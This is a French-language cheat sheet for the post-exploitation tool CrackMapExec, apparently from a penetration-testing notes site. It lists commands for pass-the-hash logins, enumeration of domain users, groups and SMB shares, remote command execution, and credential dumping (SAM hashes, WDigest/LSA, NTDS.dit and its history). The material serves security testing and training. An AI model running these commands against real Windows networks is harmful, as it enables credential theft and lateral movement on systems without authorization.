CrackMapExec

CrackMapExec (CME) - Outil de Post-Exploitation et d'Exploration CrackMapExec étant vraiment un outil très complet je vous conseille cette cheatsheet, plus détaillé

https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/ Description : CrackMapExec (CME) est un outil de post-exploitation en Python qui facilite l'exploration et l'exploitation des réseaux Windows. Il permet aux professionnels de la sécurité d'effectuer une variété de tâches sur des systèmes Windows compromis, y compris l'obtention d'informations d'identification, l'exécution de commandes à distance, l'exploitation de vulnérabilités et bien plus encore.

Exemples d'utilisation :

Connexions & Authentification :

  • Connexion à un seul hôte : crackmapexec smb 192.168.215.104 -u user -p PASS

  • Connexion à plusieurs hôtes : crackmapexec smb 192.168.1.0-28 10.0.0.1-67 -u user -p PASS

  • Connexion avec NTLM hash : crackmapexec smb 172.16.157.0/24 -u administrator -H 'LMHASH:NTHASH'

Enumeration :

  • Enumérer les utilisateurs : crackmapexec smb 192.168.215.104 -u user -p PASS --users

  • Enumérer les groupes de domaine : crackmapexec smb 192.168.215.104 -u user -p PASS --groups

  • Enumérer les partages SMB : crackmapexec smb 192.168.215.138 -u user -p PASSWORD --local-auth --shares

  • Afficher les sessions actives : crackmapexec smb 192.168.215.104 -u user -p PASS --sessions

Execution de commandes :

  • Exécuter une commande avec cmd.exe (privilèges administratifs requis) : crackmapexec smb 192.168.10.11 -u Administrator -p P@ssw0rd -x whoami

Obtention des Informations d'Identification :

  • Extraire les hachages SAM locaux : crackmapexec smb 192.168.215.104 -u Administrator -p PASS --local-auth --sam

  • Activer ou désactiver WDigest pour obtenir les informations d'identification depuis la mémoire LSA : crackmapexec smb 192.168.215.104 -u Administrator -p PASS --local-auth --wdigest enable

  • Extraire le fichier NTDS.dit à partir du contrôleur de domaine (DC) : crackmapexec smb 192.168.1.100 -u UserName -p PASSWORDHERE --ntds

  • Extraire l'historique des mots de passe du fichier NTDS.dit : crackmapexec smb 192.168.1.0/24 -u UserName -p PASSWORDHERE --ntds-history

Options Principales :

  • smb : Utiliser le module SMB pour interagir avec les hôtes Windows.

  • -u <nom_utilisateur> : Spécifier le nom d'utilisateur pour l'authentification.

  • -p <mot_de_passe> : Spécifier le mot de passe pour l'authentification.

  • --shares : Répertorier les partages SMB sur une machine cible.

  • -x "commande" : Exécuter une commande sur un système distant.

  • --exec-method=<méthode> : Spécifier la méthode d'exécution pour l'exploitation.

  • --exe-file=<fichier_exploit> : Spécifier le fichier d'exploitation à utiliser.

Last updated